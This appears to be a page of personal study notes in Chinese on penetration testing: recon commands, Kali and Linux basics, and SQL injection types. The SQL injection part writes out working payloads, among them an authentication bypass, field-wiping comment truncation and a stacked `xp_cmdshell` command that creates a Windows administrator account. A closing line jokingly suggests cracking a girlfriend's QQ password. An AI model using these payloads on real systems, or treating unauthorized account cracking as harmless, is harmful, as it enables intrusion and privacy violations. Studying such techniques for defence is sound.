摘抄记录

目录

• 理论记录：
• Hacker
• Kali
  • Kali的知识点
  • 另外知识点

理论记录：

吐司论坛、蜘蛛池
蜘蛛、泛目录、网站优化、信息安全
> 泛站群 泛站群（顶级域名二级域名 收录，）linux


1. 渗透测试其实就是通过一些手段来找到网站，APP，网络服务，软件，服务器等网络设备和应用的漏洞，告诉管理员有哪些漏洞，怎么填补，从而防止黑客的入侵。

渗透测试分为 白盒测试 和 黑盒测试
白盒测试就是在知道目标网站源码和其他一些信息的情况下对其进行渗透，有点类似于代码分析
黑盒测试就是只告诉我们这个网站的url，其他什么都不告诉，然后让你去渗透，模拟黑客对网站的渗透

般来说，渗透测试的基本流程如下：
确定目标、信息收集、漏洞探测、漏洞利用getshell、内网转发、内网渗透、痕迹清除、撰写渗透测试报告

黑客分门别类:
脚本小子　　此类黑客只获得了有限的训练或完全未经训练，只知道如何使用基本的
工具或技术。他们甚至可能完全不理解自己正在做什么。
白帽黑客　此类黑客按照攻击团队的方式思考，但为好人服务。一般认为他们的特征
是，有着一套通常被视为道德规范的“不造成任何损害”的原则。这个群体也被称为渗透
测试者。
灰帽黑客　此类黑客游走在黑白两道之间，现已决定改弦更张，弃恶从善。但即使已
改过自新，仍不能完全信任他们。另外，在现代安全界，这类人员也会发现并利用漏洞，
而后将结果提供给供应商，可能免费，也可能换取某种形式的报酬
黑帽黑客 此类黑客是违反法律的恶徒。他们的行动可能有一定的计划，也可能毫
无规律可言。在大多数情况下，黑帽黑客的做法和彻头彻尾的犯罪行为之间并没有太大
区别。
网络恐怖分子 网络恐怖分子是一种新形式的攻击者，他们试图摧毁目标而不考虑隐
藏身份。本质上他们是为证明某个观点，而并不担心被捕或入狱

Hacker

关键词：Python、linux、熟悉业界安全标准-比如ISO27001, ISO20000, 等级保护等、cisp报考攻略
具有CISA、CISP、CISSP、CDPSE等信息安全与隐私合规证书者优先；


1.httrack:克隆网站工具
以root 打开 apt-get install httrack
-创建一个目录mywebsites: mkdir mywebsites=>cd mywebsites
-输入httrack
2. ping traceroute baidu.com
3. dig -t ns baidu.com 目标dns的授权dns服务器 


链接：
博主推荐：
https://www.zhihu.com/people/29-50-71-23
一文搞懂XSS攻击、SQL注入、CSRF攻击、DDOS攻击和DNS劫持 
https://zhuanlan.zhihu.com/p/578098922
目前最为完整的cisp报考攻略
https://zhuanlan.zhihu.com/p/152439463


（）sql注入：
知识：
SQL注入类型可分为两大类：数字型注入（不需要添加特殊字符即可闭合）和字符型注入（需要添加特殊字符如 ' " ; ) , %等字符用作闭合语句 ）
字符型注入和数字型注入又可以分为具体的 UNION（联合查询）注入、盲注（分为时间盲注和布尔型盲注）、报错注入、堆叠注入、宽字节注入、二次注入、请求头注入、写入webshell


例子：
0.注释 sqlserver -- mysql #
1. or 1=1 、'' or 1=1 #(--)   //所有名字
select name from student where id=1 or 1=1 
select * from user where uername='$name' and password='$pass';
select * from user where uername=' ' or 1=1 # ' and password=balabala
2. //导致了SQL语句提前闭合，数据表中的memo字段被清空
update table set memo = 'id' where id=1
update table set memo = ''#jjjkjkjjjjkjk'  where id=1 
3. 如此循环，直至猜到表名为止。//数据库不分大小写
select name from student where id=1  and (select count(*) from teacher)>0
4.
select FMATERIALID from T_PRD_MOENTRY where fid=100112;exec master..xp_cmdshell "net localgroup name administrators /add" --将新建的帐号name加入管理员组
--;exec master..xp_cmdshell "net user name password /add"-- 用net命令新建了用户名为name、密码为password的windows的帐号
5. 数据库、日志备份
// 完整数据库备份
BACKUP DATABASE test TO DISK = 'E:/backups/wht_sm.bak'
// 差异性数据库备份
BACKUP DATABASE test TO DISK = 'E:/backups/wht_sm.bak'  WITH DIFFERENTIAL
// 日志备份
BACKUP LOG test TO DISK = 'E:/backups/wht_SM_log.bak'



 100.查看Windows系统的当前用户名
whoami、net user 、echo %username%
101.
%2B解释为+号，%25解释为%号
102.
用Get方法注入时，IIS会记录你所有的提交字符串，对Post方法做则不记录，所以能用Post的网址尽量不用Get。


DDoS的原理其实不复杂，就是利用大量肉鸡，仿照真实用户行为，使目标服务器资源消耗殆尽，最终无法为用户提供服务。
就好像一家火锅店来了一群地痞流氓，光占座不叫餐，导致正常顾客没座位，点不了餐，火锅店无法正常开店。

Kali

推荐：

• 官网 https://www.kali.org/
• VMware https://www.vmware.com/
• kali学习系列blog https://blog.csdn.net/Fighting_hawk/article/details/122607421
• 学习路线 https://blog.csdn.net/kjuhfkicf154/article/details/128114387

提示：以下是本篇文章正文内容，下面案例可供参考

Kali的知识点

1. 登录账号kali,密码kali
2. KaLi终端字体改变
放大：Ctrl+Shift+加号
缩小：Ctrl+减号
1. [sudo] password for kali:kali
2. sudo echo "zhouyi"
3. └─$ sudo passwd       
New password: zhouyi
----------
1. sudo -i 并回车，在弹出下一行时输入超级管理员的密码
2. 在超级管理员模式下，输入命令 fdisk -l ，查询硬盘信息。在Linux系统中，一些皆文件，像该硬盘名为sda，其中sd表示硬盘类型，a表示第一块硬盘。
3. 输入命令 cat /proc/meminfo ，查询内存信息。meminfo表示memory information的缩写。
4.  输入命令 cat /proc/cpuinfo ，查询CPU信息。cpuinfo表示mCPU information的缩写。
5.  输入命令 clear 清除当前显示信息。
6.  输入 reboot 进行重启，输入 poweroff /init 0 进行关机。
7. sudo vim /etc/apt/source.list 更改源 sudo apt-get update 更新软件列表sudo apt-get upgrade更新软件包
在 Linux 中使用 vim 时，输入 vim xxx.file 输入好文件内容之后，怎么保存呢？
按 ESC，左下角就可以进行输入
:w 保存但不退出
:wq 保存并退出
:q 退出
:q! 强制退出，不保存

cd ..：返回上一级目录。
cd /：返回根目录。
cd /etc：进入根目录下的etc子文件夹，绝对路径进入法。
cd etc：假如目前就处于根目录下，那么可以直接进入当前文件的子文件，相对路径进入法。
pwd：查看当前所在路径。
ls：查看当前文件夹中的所有文件。

另外知识点

127.0.0.1表示回环地址，代表自己。可以用于ping测试，若无法通信则网卡损坏。
255.0.0.0表示子网掩码类型。

SRC漏洞挖掘，WIFI网络破解，配套靶场练习等等。当然，你也可以尝试破解一下你女朋友的QQ密码。
XSS跨站脚本攻击（Cross-Site Scripting，XSS）
CSRF跨站请求伪造（Cross Site Request Forgery）